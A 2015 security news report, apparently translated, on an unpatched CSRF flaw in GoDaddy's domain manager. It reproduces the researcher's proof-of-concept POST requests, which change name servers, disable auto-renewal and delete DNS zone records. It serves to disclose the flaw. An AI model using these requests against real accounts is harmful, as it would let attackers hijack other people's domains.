Tuesday, 20 January 2015

A remote attacker could take control of any domain registered with the service.

Security researcher Dylan Saccomanni has found a CSRF vulnerability in the domain registrar GoDaddy that allows a remote attacker to seize control of any domain registered with the company. At the time of publication the flaw had not been fixed, which leaves the owners of every domain registered with GoDaddy exposed to compromise.



The researcher says GoDaddy has no protection against CSRF attacks at all: an attacker who gets a logged-in customer to open a malicious page can change the domain's name servers, alter its auto-renewal settings and edit its zone files. Saccomanni tried to reach GoDaddy's security team by e-mail and on social networks, but was told that no fix was expected in the near future. He therefore decided to publish proof-of-concept exploit code.


Name servers

Below is the POST request that saves edited name servers:
POST /dcc50/Modals/DomainActions/NSManageWS.asmx/ValidateNameserver HTTP/1.1
Host: dcc.godaddy.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 175
Cookie: [REDACTED]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{'request':'{"isall":false,"nsobjs":[{"ns":"foo.example.com","ips": [],"index":0,"add":1,"status":""}, {"ns":"bar.example.com","ips": [],"index":1,"add":1,"status":""}]}'}

Auto-renewal

Below is the PoC request that disables automatic renewal:

POST /dcc50/Modals/DomainActions/AutoRenewWS.asmx/Commit HTTP/1.1
Host: dcc.godaddy.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 71
Cookie: [REDACTED]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{'request':'{"isAutoRenew":false,"isExtendedAR":false,"extARYears":0}'}

DNS zone file

Below is the PoC request that changes DNS records in the classic zone-file manager:

POST /ZoneFile_WS.asmx/SaveRecords HTTP/1.1
Host: dns.godaddy.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
Content-Length: 922
Cookie: [REDACTED]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"sInput":"<PARAMS><PARAM name=\"domainName\" value=\"[REDACTED]\"><PARAM name=\"zoneType\" value=\"0\"><PARAM name=\"aRecEditCount\" value=\"0\"><PARAM name=\"aRecDeleteCount\" value=\"0\"><PARAM name=\"cnameRecEditCount\" value=\"0\"><PARAM name=\"cnameRecDeleteCount\" value=\"1\"><PARAM name=\"cnameRecDelete0Index\" value=\"1\"><PARAM name=\"mxRecEditCount\" value=\"0\"><PARAM name=\"mxRecDeleteCount\" value=\"0\"><PARAM name=\"txtRecEditCount\" value=\"0\"><PARAM name=\"srvRecEditCount\" value=\"0\"><PARAM name=\"aaaaRecEditCount\" value=\"0\"><PARAM name=\"soaRecEditCount\" value=\"0\"><PARAM name=\"nsRecEditCount\" value=\"0\"></PARAMS>"}


Source: securitylab.ru
